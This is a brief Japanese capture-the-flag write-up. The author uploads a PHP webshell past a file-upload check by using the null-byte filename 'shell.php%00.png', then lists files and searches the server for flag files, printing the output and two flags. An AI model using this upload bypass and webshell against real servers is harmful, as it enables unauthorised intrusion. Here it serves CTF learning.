調査

ファイルがアップロードできるようだ。 shellが何とか言ってるし、ファイルアップロードだし、phpだし。 phpのwebshellをアップロードしてみよう。 ファイル名はもちろんshell.php%00.png

webshell

webshellが成立するので、色々探す。

$ ls

index.php -> 特に気になる点なし
resources
show.php -> 特に気になる点なし
upload.php -> 特に気になる点なし
uploads

$ find / -iname "*flag*"

/home/hermit/flag
/home/hermit/flag/userflag.txt -> UMASS{a_picture_paints_a_thousand_shells}
/tmp/flag -> UMASS{a_test_of_integrity}
/usr/bin/dpkg-buildflags
/usr/include/x86_64-linux-gnu/asm/processor-flags.h
/usr/include/x86_64-linux-gnu/bits/waitflags.h
/usr/include/x86_64-linux-gnu/bits/ss_flags.h
/usr/include/linux/tty_flags.h
/usr/include/linux/kernel-page-flags.h
/usr/local/lib/php/build/ax_check_compile_flag.m4
/usr/share/perl5/Dpkg/BuildFlags.pm
/usr/share/dpkg/buildflags.mk
/usr/lib/x86_64-linux-gnu/perl/5.28.1/bits/ss_flags.ph
/usr/lib/x86_64-linux-gnu/perl/5.28.1/bits/waitflags.ph
/sys/devices/pnp0/00:05/tty/ttyS2/flags
/sys/devices/pnp0/00:03/tty/ttyS0/flags
/sys/devices/pnp0/00:06/tty/ttyS3/flags
/sys/devices/pnp0/00:04/tty/ttyS1/flags
/sys/devices/virtual/net/lo/flags
/sys/devices/virtual/net/eth0/flags
/sys/module/scsi_mod/parameters/default_dev_flags
/proc/sys/kernel/acpi_video_flags
/proc/sys/kernel/sched_domain/cpu0/domain0/flags
/proc/sys/kernel/sched_domain/cpu1/domain0/flags
/proc/kpageflags